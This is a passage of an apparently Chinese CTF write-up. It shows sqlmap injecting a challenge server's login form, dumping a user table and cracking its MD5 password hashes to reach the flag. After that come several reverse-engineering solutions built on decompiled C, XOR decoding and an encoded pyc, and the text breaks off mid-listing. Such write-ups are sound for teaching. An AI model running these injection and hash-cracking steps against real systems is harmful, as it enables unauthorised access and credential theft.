<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u http:&#x2F;&#x2F;219.219.61.234:43001&#x2F; --forms</span><br><span class="line">[#1] form:</span><br><span class="line">POST http:&#x2F;&#x2F;219.219.61.234:43001&#x2F;index.php</span><br><span class="line">POST data: username&#x3D;&amp;password&#x3D;</span><br><span class="line">do you want to test this form? [Y&#x2F;n&#x2F;q] </span><br><span class="line">&gt; y</span><br><span class="line">Edit POST data [default: username&#x3D;&amp;password&#x3D;] (Warning: blank fields detected): </span><br><span class="line">do you want to fill blank fields with random values? [Y&#x2F;n] y</span><br><span class="line">[23:19:34] [INFO] POST parameter &#39;username&#39; appears to be &#39;MySQL &gt;&#x3D; 5.0.12 AND time-based blind (query SLEEP)&#39; injectable       </span><br><span class="line">it looks like the back-end DBMS is &#39;MySQL&#39;. Do you want to skip test payloads specific for other DBMSes? [Y&#x2F;n] y</span><br><span class="line">for the remaining tests, do you want to include all tests for &#39;MySQL&#39; extending provided level (1) and risk (1) values? [Y&#x2F;n] y</span><br><span class="line">[23:19:48] [INFO] POST parameter &#39;username&#39; is &#39;Generic UNION query (NULL) - 1 to 20 columns&#39; injectable                        </span><br><span class="line">POST parameter &#39;username&#39; is vulnerable. Do you want to keep testing the others (if any)? [y&#x2F;N] n</span><br><span class="line">do you want to exploit this SQL injection? [Y&#x2F;n] y</span><br><span class="line">[23:19:56] [INFO] the back-end DBMS is MySQL</span><br><span class="line">back-end DBMS: MySQL &gt;&#x3D; 5.0.12 (MariaDB fork)</span><br></pre></td></tr></table></figure>

<p>发现sqlmap可以进行注入，获取数据库：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u http:&#x2F;&#x2F;219.219.61.234:43001&#x2F; --forms --dbs</span><br><span class="line"></span><br><span class="line">[*] cumtctf</span><br><span class="line">[*] information_schema</span><br><span class="line">[*] mysql</span><br><span class="line">[*] performance_schema</span><br><span class="line">[*] test</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>再看一下cumtctf数据库里有哪些表：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u http:&#x2F;&#x2F;219.219.61.234:43001&#x2F; --forms -D cumtctf --tables</span><br><span class="line"></span><br><span class="line">Database: cumtctf</span><br><span class="line">[2 tables]</span><br><span class="line">+--------+</span><br><span class="line">| ctfers |</span><br><span class="line">| emails |</span><br><span class="line">+--------+</span><br></pre></td></tr></table></figure>

<p>直接爆破ctfers表：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u http:&#x2F;&#x2F;219.219.61.234:43001&#x2F; --forms -D cumtctf -T ctfers --dump</span><br><span class="line"></span><br><span class="line">do you want to store hashes to a temporary file for eventual further processing with other tools [y&#x2F;N] y</span><br><span class="line">[23:24:05] [INFO] writing hashes to a temporary file &#39;&#x2F;tmp&#x2F;sqlmapgufu7dtd2666&#x2F;sqlmaphashes-ghwqb2ze.txt&#39;                        </span><br><span class="line">do you want to crack them via a dictionary-based attack? [y&#x2F;N&#x2F;q] y</span><br><span class="line">[23:24:06] [INFO] using hash method &#39;md5_generic_passwd&#39;</span><br><span class="line">what dictionary do you want to use?</span><br><span class="line">[1] default dictionary file &#39;&#x2F;usr&#x2F;share&#x2F;sqlmap&#x2F;data&#x2F;txt&#x2F;wordlist.tx_&#39; (press Enter)</span><br><span class="line">[2] custom dictionary file</span><br><span class="line">[3] file with list of dictionary files</span><br><span class="line">&gt; 1</span><br><span class="line">[23:24:08] [INFO] using default dictionary</span><br><span class="line">do you want to use common password suffixes? (slow!) [y&#x2F;N] y</span><br></pre></td></tr></table></figure>

<p>爆破结果如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">id,password,username,last_login,failed_login</span><br><span class="line">1,5f4dcc3b5aa765d61d8327deb882cf99 (password),Aaron,2020-11-25 09:30:53,0</span><br><span class="line">2,6e7ccc7a0863b0914f675c7c8ea47321,Andrew,2020-11-25 09:30:53,0</span><br><span class="line">3,f5ca2d0fea818f7c46b004aa04214791 (abc456),Ghris,2020-11-25 09:30:53,0</span><br><span class="line">4,5b25f2474947e69b2aaddc650a6bcc4d,Bob,2020-11-25 09:30:53,0</span><br><span class="line">5,144f1a454d7573ebc84c55e2ad0eb194,Jam,2020-11-25 09:30:53,0</span><br><span class="line">6,b86d51d4ce12cdf48d69ed20063bfd40,Jack,2020-11-25 09:30:53,0</span><br><span class="line">7,a976c644162d5a09c18edbf9234ea481 (gordon111),Gordon,2020-11-25 09:30:53,0</span><br><span class="line">8,55b7cb47279ffdb24d8b20dd1409b70c,Peter,2020-11-25 09:30:53,0</span><br><span class="line">9,e19d5cd5af0378da05f63f891c7467af (abcd1234),Daney,2020-11-25 09:30:53,0</span><br><span class="line">10,11b21d5477537499cea469a3edd05780 (asdf4563),Glendon,2020-11-25 09:30:53,0</span><br><span class="line">11,76a2173be6393254e72ffa4d6df1030a (passwd),Blake,2020-11-25 09:30:53,0</span><br><span class="line">12,5f58af2de10cbae78365e67dd06e6d3a (dickdick123),Dick,2020-11-25 09:30:53,0</span><br><span class="line">13,6fb6c392b4c9421c427f91e097038bf0,Curry,2020-11-25 09:30:53,0</span><br><span class="line">14,88af658c85bd985f261f3daadbd64d09 (mouse123),Jerry,2020-11-25 09:30:53,0</span><br><span class="line">15,06e3c2a908365f6d25ffc15a42b3b8b0 (cat123),Tom,2020-11-25 09:30:53,0</span><br><span class="line">16,cumtctf&#123;sct597ap-xm16-0sh3-87qs-xarfuk302uil&#125;,Sam,2020-11-25 09:30:53,0</span><br><span class="line">17,1164f9e5b8cef768396dcd5374e4b6eb (passwd123),Lorin,2020-11-25 09:30:53,0</span><br><span class="line">18,f5ca2d0fea818f7c46b004aa04214791 (abc456),James,2020-11-25 09:30:53,0</span><br><span class="line">19,5d93ceb70e2bf5daa84ec3d0cd2c731a (qwer1234),Rax,2020-11-25 09:30:53,0</span><br><span class="line">20,cb28e00ef51374b841fb5c189b2b91c9 (password123456),Mark,2020-11-25 09:30:53,0</span><br></pre></td></tr></table></figure>

<p>得到Flag。</p>
<h2 id="RE"><a href="#RE" class="headerlink" title="RE"></a>RE</h2><h3 id="签到-1"><a href="#签到-1" class="headerlink" title="签到"></a>签到</h3><blockquote>
<p>Author: 周浩</p>
</blockquote>
<p>将main反编译：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">int __cdecl main(int argc, const char **argv, const char **envp)</span><br><span class="line">&#123;</span><br><span class="line">  size_t v3; &#x2F;&#x2F; rbx</span><br><span class="line">  char Str[8]; &#x2F;&#x2F; [rsp+20h] [rbp-40h]</span><br><span class="line">  __int16 v6; &#x2F;&#x2F; [rsp+50h] [rbp-10h]</span><br><span class="line">  int i; &#x2F;&#x2F; [rsp+5Ch] [rbp-4h]</span><br><span class="line"></span><br><span class="line">  _main();</span><br><span class="line">  memset(Str, 0, &#39;0&#39;);</span><br><span class="line">  v6 &#x3D; 0;</span><br><span class="line">  strcpy(Str, &quot;abcdefghijklmnjlkj&quot;);</span><br><span class="line">  for ( i &#x3D; 0; ; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    v3 &#x3D; i;</span><br><span class="line">    if ( v3 &gt;&#x3D; strlen(Str) )</span><br><span class="line">      break;</span><br><span class="line">    Str[i] +&#x3D; 7;</span><br><span class="line">  &#125;</span><br><span class="line">  puts(Str);</span><br><span class="line">  return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可以看到代码逻辑很简单，对str中的每个字符进行了+7操作。</p>
<p>查看程序中的字符串，发现有：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.rdata:0000000000404000	00000012	C	&#123;opzfpzfzvzvfohyk</span><br></pre></td></tr></table></figure>

<p>写脚本得flag：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">s &#x3D; &#39;&#123;opzfpzfzvzvfohyk&#39;</span><br><span class="line"></span><br><span class="line">sl &#x3D; [x for x in s]</span><br><span class="line"></span><br><span class="line">for i in range(len(sl)):</span><br><span class="line">    sl[i] &#x3D; chr(ord(sl[i]) - 7)</span><br><span class="line"></span><br><span class="line">print(&quot;&quot;.join(sl))</span><br></pre></td></tr></table></figure>

<p>输出：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">this_is_soso_hard</span><br></pre></td></tr></table></figure>

<p>按格式拼凑flag提交即可。</p>
<h3 id="真签到"><a href="#真签到" class="headerlink" title="真签到"></a>真签到</h3><blockquote>
<p>Author: 周浩</p>
</blockquote>
<p>在IDA中查看，反编译如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><span class="line">int __cdecl main(int argc, const char **argv, const char **envp)</span><br><span class="line">&#123;</span><br><span class="line">  int v4; &#x2F;&#x2F; [rsp+20h] [rbp-80h]</span><br><span class="line">  int v5; &#x2F;&#x2F; [rsp+24h] [rbp-7Ch]</span><br><span class="line">  int v6; &#x2F;&#x2F; [rsp+28h] [rbp-78h]</span><br><span class="line">  int v7; &#x2F;&#x2F; [rsp+2Ch] [rbp-74h]</span><br><span class="line">  int v8; &#x2F;&#x2F; [rsp+30h] [rbp-70h]</span><br><span class="line">  int v9; &#x2F;&#x2F; [rsp+34h] [rbp-6Ch]</span><br><span class="line">  int v10; &#x2F;&#x2F; [rsp+38h] [rbp-68h]</span><br><span class="line">  int v11; &#x2F;&#x2F; [rsp+3Ch] [rbp-64h]</span><br><span class="line">  int v12; &#x2F;&#x2F; [rsp+40h] [rbp-60h]</span><br><span class="line">  int v13; &#x2F;&#x2F; [rsp+44h] [rbp-5Ch]</span><br><span class="line">  int v14; &#x2F;&#x2F; [rsp+48h] [rbp-58h]</span><br><span class="line">  int v15; &#x2F;&#x2F; [rsp+4Ch] [rbp-54h]</span><br><span class="line">  int v16; &#x2F;&#x2F; [rsp+50h] [rbp-50h]</span><br><span class="line">  int v17; &#x2F;&#x2F; [rsp+54h] [rbp-4Ch]</span><br><span class="line">  int v18; &#x2F;&#x2F; [rsp+58h] [rbp-48h]</span><br><span class="line">  int v19; &#x2F;&#x2F; [rsp+5Ch] [rbp-44h]</span><br><span class="line">  int v20; &#x2F;&#x2F; [rsp+60h] [rbp-40h]</span><br><span class="line">  int v21; &#x2F;&#x2F; [rsp+64h] [rbp-3Ch]</span><br><span class="line">  int v22; &#x2F;&#x2F; [rsp+68h] [rbp-38h]</span><br><span class="line">  int v23; &#x2F;&#x2F; [rsp+6Ch] [rbp-34h]</span><br><span class="line">  int v24; &#x2F;&#x2F; [rsp+70h] [rbp-30h]</span><br><span class="line">  int v25; &#x2F;&#x2F; [rsp+74h] [rbp-2Ch]</span><br><span class="line">  int v26; &#x2F;&#x2F; [rsp+78h] [rbp-28h]</span><br><span class="line">  int v27; &#x2F;&#x2F; [rsp+7Ch] [rbp-24h]</span><br><span class="line">  int v28; &#x2F;&#x2F; [rsp+80h] [rbp-20h]</span><br><span class="line">  int v29; &#x2F;&#x2F; [rsp+84h] [rbp-1Ch]</span><br><span class="line">  int v30; &#x2F;&#x2F; [rsp+88h] [rbp-18h]</span><br><span class="line">  int v31; &#x2F;&#x2F; [rsp+8Ch] [rbp-14h]</span><br><span class="line">  int v32; &#x2F;&#x2F; [rsp+90h] [rbp-10h]</span><br><span class="line">  int v33; &#x2F;&#x2F; [rsp+94h] [rbp-Ch]</span><br><span class="line">  int v34; &#x2F;&#x2F; [rsp+98h] [rbp-8h]</span><br><span class="line">  int i; &#x2F;&#x2F; [rsp+9Ch] [rbp-4h]</span><br><span class="line"></span><br><span class="line">  _main();</span><br><span class="line">  v4 &#x3D; 76;</span><br><span class="line">  v5 &#x3D; 0;</span><br><span class="line">  v6 &#x3D; 5;</span><br><span class="line">  v7 &#x3D; 54;</span><br><span class="line">  v8 &#x3D; 101;</span><br><span class="line">  v9 &#x3D; 7;</span><br><span class="line">  v10 &#x3D; 39;</span><br><span class="line">  v11 &#x3D; 38;</span><br><span class="line">  v12 &#x3D; 45;</span><br><span class="line">  v13 &#x3D; 1;</span><br><span class="line">  v14 &#x3D; 3;</span><br><span class="line">  v15 &#x3D; 0;</span><br><span class="line">  v16 &#x3D; 13;</span><br><span class="line">  v17 &#x3D; 86;</span><br><span class="line">  v18 &#x3D; 1;</span><br><span class="line">  v19 &#x3D; 3;</span><br><span class="line">  v20 &#x3D; 101;</span><br><span class="line">  v21 &#x3D; 3;</span><br><span class="line">  v22 &#x3D; 45;</span><br><span class="line">  v23 &#x3D; 22;</span><br><span class="line">  v24 &#x3D; 2;</span><br><span class="line">  v25 &#x3D; 21;</span><br><span class="line">  v26 &#x3D; 3;</span><br><span class="line">  v27 &#x3D; 101;</span><br><span class="line">  v28 &#x3D; 0;</span><br><span class="line">  v29 &#x3D; 41;</span><br><span class="line">  v30 &#x3D; 68;</span><br><span class="line">  v31 &#x3D; 68;</span><br><span class="line">  v32 &#x3D; 1;</span><br><span class="line">  v33 &#x3D; 68;</span><br><span class="line">  v34 &#x3D; 43;</span><br><span class="line">  for ( i &#x3D; 0; i &lt;&#x3D; 30; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    *((_DWORD *)&amp;A + i) &#x3D; *(&amp;v4 + i);</span><br><span class="line">    *((_BYTE *)&amp;B + i) &#x3D; s[*((signed int *)&amp;A + i)];</span><br><span class="line">    C[i] +&#x3D; *((_BYTE *)&amp;B + i);</span><br><span class="line">  &#125;</span><br><span class="line">  puts(C);</span><br><span class="line">  return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>运行得到C：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">V1hHDTlU1CVUk1CHCUYVUCHVUVV1VIv</span><br></pre></td></tr></table></figure>

<p>对其进行md5加密，即：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bbfa47d9291b467c28027a64ec9a5318</span><br></pre></td></tr></table></figure>

<p>按格式拼凑flag，提交。</p>
<h3 id="逆向也就这么难了"><a href="#逆向也就这么难了" class="headerlink" title="逆向也就这么难了"></a>逆向也就这么难了</h3><blockquote>
<p>Author: 周浩</p>
</blockquote>
<p>送分题，直接看字符串，得flag：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.rdata:0000000000404000	0000002F	C	flag&#123;Actua11y_a11_re_pr0b1ems_are_rea11y_easy&#125;</span><br></pre></td></tr></table></figure>

<h3 id="double-try"><a href="#double-try" class="headerlink" title="double try"></a>double try</h3><blockquote>
<p>Author: 周浩</p>
</blockquote>
<p>下载得代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">import zlib,base64</span><br><span class="line">encodemessage&#x3D;b&#39;msg&#39;</span><br><span class="line">exec(base64.b64encode(zlib.compress(base64.b64encode(encodemessage))))</span><br><span class="line"></span><br><span class="line">#eJydUjlywzAM&#x2F;JJkpnVBU5pMCkBDyipcu9DQeYBMvT64aEuOm6TALLE4uACJ52mGPpr1M3T+xb5nvMU5TtOM04UQdvF0hjc1f7XrzseXOK4w44s21iQ49Ru&#x2F;N783&#x2F;8t8whvN2YFhNPTz0IHkV8Su9iWkHlo&#x2F;WX7tczG8HnD0CwQvSHYf1P+AQjgaXxQf&#x2F;u+8Bvb+ikX8NjKfvQOusXsqEl&#x2F;zF6g6AmHxLWh94XuIc9TnTlwh3Fqb8r857Uka2VBnaGIxzHJuMaslzuFc6kUxl&#x2F;TcYDj1UbU3aVS9w6gc8jzZH6jPQXZXLJfOkDdn40mDo51IbpJ83pPlFe2DEnvWDps4G+3WPXqTn7L2rDrljqDcoPc4ip3sPZlfaD4+V3vDnT55d4l3VvzK+5VdcW&#x2F;V6OTNi&#x2F;Ab3aqHd0LIsQaD5XMex4JpDhIXrYPsyJc0Vl9noVlX7p20hv+O43vsvjU9&#x2F;9VzFvpXcc8t8uey4fjAOygWjkE8Hn8AFflf5g&#x3D;&#x3D;&#39;</span><br><span class="line"></span><br><span class="line">#cd2512d512d5123e</span><br></pre></td></tr></table></figure>

<p>反相解出msg:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">s &#x3D; &#39;eJydUjlywzAM&#x2F;JJkpnVBU5pMCkBDyipcu9DQeYBMvT64aEuOm6TALLE4uACJ52mGPpr1M3T+xb5nvMU5TtOM04UQdvF0hjc1f7XrzseXOK4w44s21iQ49Ru&#x2F;N783&#x2F;8t8whvN2YFhNPTz0IHkV8Su9iWkHlo&#x2F;WX7tczG8HnD0CwQvSHYf1P+AQjgaXxQf&#x2F;u+8Bvb+ikX8NjKfvQOusXsqEl&#x2F;zF6g6AmHxLWh94XuIc9TnTlwh3Fqb8r857Uka2VBnaGIxzHJuMaslzuFc6kUxl&#x2F;TcYDj1UbU3aVS9w6gc8jzZH6jPQXZXLJfOkDdn40mDo51IbpJ83pPlFe2DEnvWDps4G+3WPXqTn7L2rDrljqDcoPc4ip3sPZlfaD4+V3vDnT55d4l3VvzK+5VdcW&#x2F;V6OTNi&#x2F;Ab3aqHd0LIsQaD5XMex4JpDhIXrYPsyJc0Vl9noVlX7p20hv+O43vsvjU9&#x2F;9VzFvpXcc8t8uey4fjAOygWjkE8Hn8AFflf5g&#x3D;&#x3D;&#39;</span><br><span class="line">print(base64.b64decode(zlib.decompress(base64.b64decode(s))))</span><br></pre></td></tr></table></figure>

<p>得到输出为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">55 0D 0D 0A 00 00 00 00 09 64 AE 5F AC 00 00 00 E3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 40 00 00 00 73 4A 00 00 00 64 00 5A 00 64 01 5A 01 64 02 5A 02 65 03 65 04 65 00 </span><br><span class="line">83 01 83 01 44 00 5D 24 5A 05 65 02 65 06 65 0765 00 65 05 19 00 83 01 65 07 65 01 65 05 19 00 83 01 41 00 83 01 37 00 5A 02 71 18 65 08 65 02 83 01 01 00 64 03 53 00 29 04 7A 13 2A 2A 2A 2A 5F </span><br><span class="line">2A 2A 2A 2A 5F 2A 2A 2A 2A 5F 2A 2A 2A 2A 7A 10 50 55 41 4C 41 4B 4C 56 56 5D 54 51 5B 7D 51 44 DA 00 4E 29 09 DA 04 66 6C 61 67 DA 01 62 DA 01 63 DA 05 72 61 6E 67 65 DA 03 6C 65 6E DA 01 69 DA 03 63 68 72 DA 03 6F 72 64 DA 05 70 72 69 6E 74 A9 00 72 0B 00 00 00 72 0B 00 00 00 FA 1E 43 3A </span><br><span class="line">5C 55 73 65 72 73 5C 6C 65 6E 6F 76 6F 5C 44 65 73 6B 74 6F 70 5C 70 79 63 2E 70 79 DA 08 3C 6D 6F 64 75 6C 65 3E 01 00 00 00 73 0A 00 00 00 04 02 04 01 04 01 10 01 22 01</span><br></pre></td></tr></table></figure>

<p>根据：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">55 0D 0D 0A 00 00 00 00</span><br></pre></td></tr></table></figure>

<p>猜测为Python3的编译文件，写入得到文件，反编译：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uncompyle6.exe -o .\Desktop\Re\double_try.py .\Desktop\Re\double_try.pyc</span><br></pre></td></tr></table></figure>

<p>得到反编译文件：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"># uncompyle6 version 3.7.4</span><br><span class="line"># Python bytecode 3.8 (3413)</span><br><span class="line"># Decompiled from: Python 3.7.9 (default, Aug 31 2020, 17:10:11) [MSC v.1916 64 bit (AMD64)]</span><br><span class="line"># Embedded file name: C:\Users\lenovo\Desktop\pyc.py</span><br><span class="line"># Compiled at: 2020-11-13 18:46:33</span><br><span class="line"># Size of source mod 2**32: 172 bytes</span><br><span class="line">flag &#x3D; &#39;****_****_****_****&#39;</span><br><span class="line">b &#x3D; &#39;PUALAKLVV]TQ[&#125;QD&#39;</span><br><span class="line">c &#x3D; &#39;&#39;</span><br><span class="line">for i in range(len(flag)):</span><br><span class="line">    c +&#x3D; chr(ord(flag[i]) ^ ord(b[i]))</span><br><span class="line">else:</span><br><span class="line">    print(c)</span><br></pre></td></tr></table></figure>

<p>其中，c为cd2512d512d5123e</p>
<p>修改脚本得到flag：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">flag &#x3D; &#39;****_****_****_****&#39;</span><br><span class="line">b &#x3D; &#39;PUALAKLVV]TQ[&#125;QD&#39;</span><br><span class="line"># c &#x3D; &#39;&#39;</span><br><span class="line"># for i in range(len(flag)):</span><br><span class="line">#     c +&#x3D; chr(ord(flag[i]) ^ ord(b[i]))</span><br><span class="line"># else:</span><br><span class="line">#     print(c)</span><br><span class="line">c &#x3D; &#39;cd2512d512d5123e&#39;</span><br><span class="line">s &#x3D; &#39;&#39;</span><br><span class="line">for i in range(len(b)):</span><br><span class="line">    if i % 4 &#x3D;&#x3D; 0 and i:</span><br><span class="line">        s +&#x3D; &#39;_&#39;</span><br><span class="line">    s +&#x3D; chr(ord(c[i]) ^ ord(b[i]))</span><br><span class="line">print(s)</span><br></pre></td></tr></table></figure>

<p>按格式拼凑提交即可。</p>
<h3 id="记事本逆向"><a href="#记事本逆向" class="headerlink" title="记事本逆向"></a>记事本逆向</h3><blockquote>
<p>Author: 周浩</p>
</blockquote>
<p>Python字节码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span 